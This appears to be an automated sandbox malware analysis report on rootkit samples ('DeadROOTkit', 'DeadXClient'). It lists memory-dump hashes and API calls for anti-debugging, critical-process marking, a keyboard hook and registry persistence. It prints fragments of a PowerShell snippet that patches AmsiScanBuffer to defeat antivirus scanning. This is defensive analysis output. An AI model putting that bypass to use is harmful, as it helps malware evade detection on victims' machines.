                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71f7ea16428c26bb1a04423062e3f6bbd715203955f1a77a00c30470669dcebb
                                                        • Instruction ID: 529d2fccfc7cd7aafe88d0d33db73b13893defc573a32a61c1d0d5f0d573f023
                                                        • Opcode Fuzzy Hash: 71f7ea16428c26bb1a04423062e3f6bbd715203955f1a77a00c30470669dcebb
                                                        • Instruction Fuzzy Hash: E2F0F902F1A80E07E7A4AABC18F96F553C1DF9E275B400135F45DC32EADC195C824380
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1294563924036899762226a6afd29f903067abdbd8fb2b846cf3ba10b1233503
                                                        • Instruction ID: 2ecfee005bb9a22f383aa529362a5f381f2cfc9418683e345a44d58dc0fab972
                                                        • Opcode Fuzzy Hash: 1294563924036899762226a6afd29f903067abdbd8fb2b846cf3ba10b1233503
                                                        • Instruction Fuzzy Hash: 01F0F430B2991E0BD764AB2CA8956A933D1EF8D314B510538E04EC33D9DE28A9018782
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb28250cd0b65333a324cd1638aa82228121ad838dafb9a4cf1f472d207a65c3
                                                        • Instruction ID: 12779cf1d305e328641c7728b047862c673b0bdc7e330f3af42ac39e8da48f3f
                                                        • Opcode Fuzzy Hash: cb28250cd0b65333a324cd1638aa82228121ad838dafb9a4cf1f472d207a65c3
                                                        • Instruction Fuzzy Hash: CD01F720E6F28A0FE79663B01836AF43F915F47754F4A40FAE48C8A0E3CD5D59468361
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4b6986dd7c63cc42423ef241f50872d52d1daaf44a1fa17ea279c26564cde6cc
                                                        • Instruction ID: 6bc5ff93a64cc608485d1033faef72e5802e4526f54e51763a169fe41814facd
                                                        • Opcode Fuzzy Hash: 4b6986dd7c63cc42423ef241f50872d52d1daaf44a1fa17ea279c26564cde6cc
                                                        • Instruction Fuzzy Hash: DFF08B21B0DA590FD349BA28A8B58EA7BD1DF98250B0608B6F848CB1E7DD18D9858391
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SAM_^
                                                        • API String ID: 0-3658645246
                                                        • Opcode ID: 9651717fb3943bbbf90f9ec1155340cf007fff88afc1baf574bc954996c07dd4
                                                        • Instruction ID: 1fbb009390564d56ed528dee2d6d9cc6d9d97c95db5c6922eb6cacc960b1fa9d
                                                        • Opcode Fuzzy Hash: 9651717fb3943bbbf90f9ec1155340cf007fff88afc1baf574bc954996c07dd4
                                                        • Instruction Fuzzy Hash: 8432A460B1DA4D4BEB98EB7C8469A7977D2FF98300F4145BDE00DC32EADD28B8418785
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 588fcf9aa1adb13c3a3638825938aec78924569db5d599d3a773f0014f46435d
                                                        • Instruction ID: 73a2c7b1275e81cbf7a07b96e6bb4751cd01e4c13292fee81ecdaa55499962d2
                                                        • Opcode Fuzzy Hash: 588fcf9aa1adb13c3a3638825938aec78924569db5d599d3a773f0014f46435d
                                                        • Instruction Fuzzy Hash: DAF1A530A09A8D8FEBA8DF28C8557E97BE1FF54310F14426EE84DC72A5DB3499458B81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 231bd397492d362c6495f88d014849242f4f04755d45f0a7a14db90c1f91be7f
                                                        • Instruction ID: fa75cd1df8a5b874537bc8e6c8b61c65b3ca0c15c26ac9ca4d0fc8dd5999dba5
                                                        • Opcode Fuzzy Hash: 231bd397492d362c6495f88d014849242f4f04755d45f0a7a14db90c1f91be7f
                                                        • Instruction Fuzzy Hash: 72E1B430A09A4D8FEBA8DF28C8557E97BD1FF54310F14436ED84DC72A5DA74994187C2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ff4ee0abe1696e565699d2f4b325f9f2acfc6d1c34065f64d0c46aedd9d5dd6
                                                        • Instruction ID: 9831a2b4854198bc89123a152b0b27d271cc4ebd9b749c983e8f4f8732f9c144
                                                        • Opcode Fuzzy Hash: 4ff4ee0abe1696e565699d2f4b325f9f2acfc6d1c34065f64d0c46aedd9d5dd6
                                                        • Instruction Fuzzy Hash: 11511C20B0E6C90FDB9AAB7848746A5BFD0DF96219F0801FAE09DC71E7DD185802C386
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SAM_^
                                                        • API String ID: 0-3658645246
                                                        • Opcode ID: bc9bbf2c28668a87a8cfaa827e89cdb20fa28bf9a201c99c0582bce5ef903afd
                                                        • Instruction ID: a1b6ed9dbe933a6e781844a229bff195eedaba8bb42cec6e898dce3312e5b62a
                                                        • Opcode Fuzzy Hash: bc9bbf2c28668a87a8cfaa827e89cdb20fa28bf9a201c99c0582bce5ef903afd
                                                        • Instruction Fuzzy Hash: 1C118720F0E39A0BE325A7B948719793E61AF86314F8602B9E01CCB1E7DD6C594683D6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d
                                                        • API String ID: 0-2564639436
                                                        • Opcode ID: ca5e2a982c62d49392875d09742ce3e25b2f3b40902b456f04dd3cf8cc3658c7
                                                        • Instruction ID: b41d79a4cf93dbcd9ea7dd1b726ade15ffb4ae40a20e458318c8d4ee2b40e0e4
                                                        • Opcode Fuzzy Hash: ca5e2a982c62d49392875d09742ce3e25b2f3b40902b456f04dd3cf8cc3658c7
                                                        • Instruction Fuzzy Hash: 6B11B471F0935D8FEB249BE488656FD7BA0FF55304F06027BC90DD21A2DB29694087D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SAM_^
                                                        • API String ID: 0-3658645246
                                                        • Opcode ID: a116f73d4b70602a1200d66e3d86c08c322a1684bef44a7538b7f53551f4c21a
                                                        • Instruction ID: a4e3104255acb9d4348af8fc8eb452fb322c60bb0cd04a68abfa222e13b7523b
                                                        • Opcode Fuzzy Hash: a116f73d4b70602a1200d66e3d86c08c322a1684bef44a7538b7f53551f4c21a
                                                        • Instruction Fuzzy Hash: F4F06230F0D24A8BE374DB988460A787BA2AB95310F910778E01DC32F5DF28A94297C9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6f2159496ec0248daabd3b1dbf420249e0d83972e79bbc906df94c23de59415
                                                        • Instruction ID: fa75ec9e2ff9bdb2c98ee654caa31de924dbe0189c43751aff2bf8bb672309fb
                                                        • Opcode Fuzzy Hash: f6f2159496ec0248daabd3b1dbf420249e0d83972e79bbc906df94c23de59415
                                                        • Instruction Fuzzy Hash: 14B17062B0DA4D0FE768AB2C54346B87BD1EF98310F4506BEE05EC33E6DD286C024395
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cb804e9c654817715f644fec334dc4fc340b8317e63d69a18034f9caf714f05
                                                        • Instruction ID: 660df4540215c71f07b017e538e74018e5f50ac8d0ab9637456f5278edbe2bb3
                                                        • Opcode Fuzzy Hash: 6cb804e9c654817715f644fec334dc4fc340b8317e63d69a18034f9caf714f05
                                                        • Instruction Fuzzy Hash: 5FD12730F1E60E8FEB54EB789865AB97BE1EF45300F4502B9E01DC71F6CE2869468395
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d1ee0c109402bcdbe239b629de49f02d68d91637a70138ea963ee482d7b7388
                                                        • Instruction ID: 68e00a7e9d8b6075caeb5b5415f5c63cf14370a3cb7d1dddad3b1894e791afa9
                                                        • Opcode Fuzzy Hash: 1d1ee0c109402bcdbe239b629de49f02d68d91637a70138ea963ee482d7b7388
                                                        • Instruction Fuzzy Hash: E1B1C430609B4D8FEB69DF28C8557E93BE1FF55310F14426AE84DC72A6CA34A945CB82
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • Instruction Fuzzy Hash: D3017614B0DBC90FE356EB386868571BFE0DF96610B0906FFE488C61B7D9086B8183C2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ee7347f818fa238386abc1287148dcd21f398cb2f55b76a0b0ab9ef8c1065f1
                                                        • Instruction ID: 50604d165d7b597585b896575c366a77562995d7cfd805aa4fac7201697d8fbc
                                                        • Opcode Fuzzy Hash: 3ee7347f818fa238386abc1287148dcd21f398cb2f55b76a0b0ab9ef8c1065f1
                                                        • Instruction Fuzzy Hash: 9AF0AF71F0491D4BDB40EFA888995FE7BF0EF58305F400267E42DD2299DE346A4087C1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c548eb2848afb53d6743a76341b02b3146200bac7105cb5dc886cdbc39e6e2cb
                                                        • Instruction ID: 5dc8460685e3715db86905f47853411ca2e99cb055fa3ff69973a159230d27da
                                                        • Opcode Fuzzy Hash: c548eb2848afb53d6743a76341b02b3146200bac7105cb5dc886cdbc39e6e2cb
                                                        • Instruction Fuzzy Hash: 63F0D110F1D64E0BFB656AF848756B83A91EF84308F8101B9E01AC62FBDE1C6C4282C6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eed93b378f0630939ab572fbc535fc4d158a0c02c0e36aa1e35c47f37092ce94
                                                        • Instruction ID: 2e07b37477c26b1e813f5bf1f1db225c7d8671ad8d9f63bfd0acba24a1e109fa
                                                        • Opcode Fuzzy Hash: eed93b378f0630939ab572fbc535fc4d158a0c02c0e36aa1e35c47f37092ce94
                                                        • Instruction Fuzzy Hash: 98E08C10D1E2C70ED70766F408628A07F205F07160B8A02B2E4588A1E3D89C245983A6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 389bf48f066dfd914a10b99745cc3ea860b15e706e8e1da946d07c16f2d6d5be
                                                        • Instruction ID: 876c29e8ddc8b2a45892b0ca9b002ffbea6ff29af2d83dd9096c99573024b7cd
                                                        • Opcode Fuzzy Hash: 389bf48f066dfd914a10b99745cc3ea860b15e706e8e1da946d07c16f2d6d5be
                                                        • Instruction Fuzzy Hash: D0B09200F7F54A40D8243AB9086A0B8BFA09B8A120FC606F0D489C01B2D84DAAD646D6

                                                        Execution Graph

                                                        Execution Coverage:21%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:30%
                                                        Total number of Nodes:10
                                                        Total number of Limit Nodes:0
                                                        execution_graph 4701 7ffd9b8095c1 4702 7ffd9b809573 4701->4702 4702->4701 4703 7ffd9b809642 RtlSetProcessIsCritical 4702->4703 4704 7ffd9b8096a2 4703->4704 4693 7ffd9b8096e4 4694 7ffd9b8096ed SetWindowsHookExW 4693->4694 4696 7ffd9b8098a3 4694->4696 4697 7ffd9b8078c1 4698 7ffd9b8078df CheckRemoteDebuggerPresent 4697->4698 4700 7ffd9b80797f 4698->4700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.3030720722.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ffd9b800000_DeadROOTkit.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 53843e7e15153dc68be4de351468f78979ec84dc8f59660a8d135f462c6c6647
                                                        • Instruction ID: c148af3ce2a1150ae2db7a5a07d3337ea0d48db25c01f34dae88a7f43f225c31
                                                        • Opcode Fuzzy Hash: 53843e7e15153dc68be4de351468f78979ec84dc8f59660a8d135f462c6c6647
                                                        • Instruction Fuzzy Hash: 8B51313190D68C8FCB56DB6888556E97FE0EF5A310F0902ABD489C7192CA38A905C792

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.3030720722.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ffd9b800000_DeadROOTkit.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: a5f9f430aa8b6a5c41affc2079810cc53d61d77f0fcdaf284401445d12e291db
                                                        • Instruction ID: 916d4cda4680759349340c70cd62e1275164b53cc13a884901e91d61ef56a426
                                                        • Opcode Fuzzy Hash: a5f9f430aa8b6a5c41affc2079810cc53d61d77f0fcdaf284401445d12e291db
                                                        • Instruction Fuzzy Hash: 4D710631A0CA4C8FDB59DF6CD8596F9BBE0EF59321F04426ED059D3292CB75A806CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 355 7ffd9b8095c1-7ffd9b8095c5 356 7ffd9b8095c7-7ffd9b8095c8 355->356 357 7ffd9b8095ca-7ffd9b8095d9 355->357 356->357 358 7ffd9b8095db 357->358 359 7ffd9b8095dc-7ffd9b8095e9 357->359 358->359 360 7ffd9b809573-7ffd9b809582 359->360 361 7ffd9b8095eb-7ffd9b80963a 359->361 360->355 364 7ffd9b809642-7ffd9b8096a0 RtlSetProcessIsCritical 361->364 365 7ffd9b8096a2 364->365 366 7ffd9b8096a8-7ffd9b8096dd 364->366 365->366
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.3030720722.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ffd9b800000_DeadROOTkit.jbxd
                                                        Similarity
                                                        • API ID: CriticalProcess
                                                        • String ID:
                                                        • API String ID: 2695349919-0
                                                        • Opcode ID: fb0e7281cc858a9724516f6d93021fe38bf4d2a5939dc3724fd793b889e3f785
                                                        • Instruction ID: 5498154486360c7f5c7e350a9e764024af9bf61f4f938370c5e675519dff6605
                                                        • Opcode Fuzzy Hash: fb0e7281cc858a9724516f6d93021fe38bf4d2a5939dc3724fd793b889e3f785
                                                        • Instruction Fuzzy Hash: 6B41243190C6588FDB28DB98D859AFABBF0EF55311F04416EE0DAD3592CA35A542CB81

                                                        Execution Graph

                                                        Execution Coverage:72.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:34.7%
                                                        Total number of Nodes:101
                                                        Total number of Limit Nodes:11
execution_graph 237 b01799 240 b017a6 FindResourceA 237->240 241 b0179e ExitProcess 240->241 242 b017c6 SizeofResource 240->242 242->241 243 b017d9 LoadResource 242->243 243->241 244 b017e5 LockResource RegOpenKeyExW 243->244 244->241 245 b0180c RegSetValueExW 244->245 245->241 246 b01823 245->246 258 b01869 GetProcessHeap HeapAlloc StrCpyW 246->258 250 b01836 251 b01672 9 API calls 250->251 252 b01842 251->252 305 b0112d GetCurrentProcess IsWow64Process 252->305 256 b01855 256->241 318 b01518 SysAllocString SysAllocString CoInitializeEx 256->318 328 b01157 258->328 260 b01894 261 b018c6 StrCatW StrCatW 260->261 262 b0189e StrCatW 260->262 331 b019e2 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 261->331 264 b0112d 2 API calls 262->264 265 b018ab StrCatW StrCatW 264->265 265->261 270 b01987 6 API calls 271 b018f1 270->271 272 b01987 6 API calls 271->272 273 b018fd 272->273 274 b01987 6 API calls 273->274 275 b01909 274->275 276 b01987 6 API calls 275->276 277 b01915 276->277 278 b01987 6 API calls 277->278 279 b01921 278->279 280 b01987 6 API calls 279->280 281 b0192d 280->281 282 b01987 6 API calls 281->282 283 b01939 282->283 284 b01987 6 API calls 283->284 285 b01945 284->285 286 b01987 6 API calls 285->286 287 b01951 286->287 288 b01987 6 API calls 287->288 289 b0195d 288->289 290 b01987 6 API calls 289->290 291 b01969 290->291 292 b01987 6 API calls 291->292 293 b01975 292->293 294 b01987 6 API calls 293->294 295 b01828 294->295 296 b01672 SysAllocString SysAllocString CoInitializeEx 295->296 297 b01783 296->297 298 b016a5 CoInitializeSecurity 296->298 301 b01786 SysFreeString SysFreeString 297->301 299 b016c6 CoCreateInstance 298->299 300 b016bb 298->300 302 b0172d CoUninitialize 299->302 303 b016ea VariantInit 299->303 300->299 300->302 301->250 302->301 303->302 306 b0114c 305->306 307 b011ab 7 API calls 306->307 308 b01207 CoInitializeSecurity 307->308 309 b014ee 307->309 310 b01228 CoCreateInstance 308->310 311 b0121d 308->311 312 b014f1 6 API calls 309->312 313 b0124a VariantInit 310->313 317 b01442 CoUninitialize 310->317 311->310 311->317 312->256 315 b0128d 313->315 316 b013db VariantInit VariantInit VariantInit 315->316 315->317 316->317 317->312 319 b0154b CoInitializeSecurity 318->319 320 b0165d SysFreeString SysFreeString 318->320 321 b01561 319->321 322 b0156c CoCreateInstance 319->322 320->241 321->322 323 b01657 CoUninitialize 321->323 322->323 324 b0158e VariantInit 322->324 323->320 325 b015d1 324->325 326 b01629 325->326 327 b01603 VariantInit 325->327 326->323 327->326 351 b0118c GetModuleHandleA 328->351 330 b01176 330->260 354 b01000 CryptAcquireContextW 331->354 334 b01a38 StrStrIW 339 b01a9e 334->339 335 b018d9 344 b01987 lstrlenW 335->344 336 b01b72 6 API calls 336->335 337 b01a58 StrStrIW StrNCatW StrCatW 338 b01b42 StrCatW StrStrIW 337->338 337->339 338->339 339->336 339->337 340 b01afc StrCatW StrNCatW 339->340 341 b01b28 StrCatW 339->341 342 b01ae0 StrCatW StrCatW 339->342 343 b01b19 StrCatW 340->343 341->338 341->339 342->343 343->341 357 b0104f 344->357 347 b019b4 StrStrIW 348 b018e5 347->348 349 b019c0 347->349 348->270 350 b019c1 StrStrIW 349->350 350->348 350->350 352 b011a8 351->352 353 b0119b GetProcAddress 351->353 352->330 353->330 355 b01048 354->355 356 b0102a CryptGenRandom CryptReleaseContext 354->356 355->334 355->335 356->355 358 b01000 3 API calls 357->358 359 b0107a 358->359 359->347 359->348

                                                        Callgraph

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00008000,75B12EB0,00000000,00B02230), ref: 00B019F5
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B01A02
                                                        • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00B01A16
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B01A1D
                                                          • Part of subcall function 00B01000: CryptAcquireContextW.ADVAPI32(00B01A30,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00B01A30), ref: 00B01020
                                                          • Part of subcall function 00B01000: CryptGenRandom.ADVAPI32(00B01A30,00004000,00000000,?,00B01A30), ref: 00B0102F
                                                          • Part of subcall function 00B01000: CryptReleaseContext.ADVAPI32(00B01A30,00000000,?,00B01A30), ref: 00B01042
                                                        • StrStrIW.KERNELBASE(?,00B037F0), ref: 00B01A47
                                                        • StrStrIW.SHLWAPI(00000002,00B037F0), ref: 00B01A6E
                                                        • StrNCatW.SHLWAPI(00000000,?,?), ref: 00B01A85
                                                        • StrCatW.SHLWAPI(00000000,00B037F4), ref: 00B01A91
                                                        • StrCatW.SHLWAPI(?,'+[Char](), ref: 00B01AE9
                                                        • StrCatW.SHLWAPI(?,?), ref: 00B01AF3
                                                        • StrCatW.SHLWAPI(?,'+'), ref: 00B01B1D
                                                        • StrCatW.SHLWAPI(00000000,?), ref: 00B01B2D
                                                        • StrCatW.SHLWAPI(00000000,00B037F4), ref: 00B01B48
                                                        • StrStrIW.SHLWAPI(?,00B037F0), ref: 00B01B62
                                                        • StrCatW.SHLWAPI(00000000,?), ref: 00B01B76
                                                        • StrCpyW.SHLWAPI(?,00000000), ref: 00B01B7D
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B01B8B
                                                        • HeapFree.KERNEL32(00000000), ref: 00B01B94
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B01B9A
                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00B01B9D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                        • String ID: '+'$'+[Char]($)+'
                                                        • API String ID: 3510167801-3465596256
                                                        • Opcode ID: 098ce96fb108d946fa9029e78a7c4cd2ecdc82d27bf8132f4d8fcfea21776453
                                                        • Instruction ID: 36952fbbb9bae42e1dcaeb6990e761f157e29b1c25b6b1a52d24b56aa3d6f551
                                                        • Opcode Fuzzy Hash: 098ce96fb108d946fa9029e78a7c4cd2ecdc82d27bf8132f4d8fcfea21776453
                                                        • Instruction Fuzzy Hash: 6051DEB1E00219ABCB14DBA8DD4D9AEBBFDFB48700B14445AE505E7290EA759A05CB60

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 152 b017a6-b017c0 FindResourceA 153 b01863-b01868 152->153 154 b017c6-b017d3 SizeofResource 152->154 155 b01862 154->155 156 b017d9-b017e3 LoadResource 154->156 155->153 156->155 157 b017e5-b0180a LockResource RegOpenKeyExW 156->157 157->155 158 b0180c-b01821 RegSetValueExW 157->158 158->155 159 b01823-b01859 call b01869 call b01672 * 2 call b0112d call b011ab 158->159 159->155 170 b0185b-b0185d call b01518 159->170 170->155
                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 00B017B6
                                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017C9
                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017DB
                                                        • LockResource.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B017E6
                                                        • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,00B0179E), ref: 00B01802
                                                        • RegSetValueExW.KERNELBASE(?,Deadstager,00000000,00000003,00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B01819
                                                          • Part of subcall function 00B01869: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00B01828,?,?,?,?,?,00B0179E), ref: 00B01873
                                                          • Part of subcall function 00B01869: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B0187A
                                                          • Part of subcall function 00B01869: StrCpyW.SHLWAPI(00000000,00B02230), ref: 00B01889
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 00B018A4
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 00B018BC
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 00B018C4
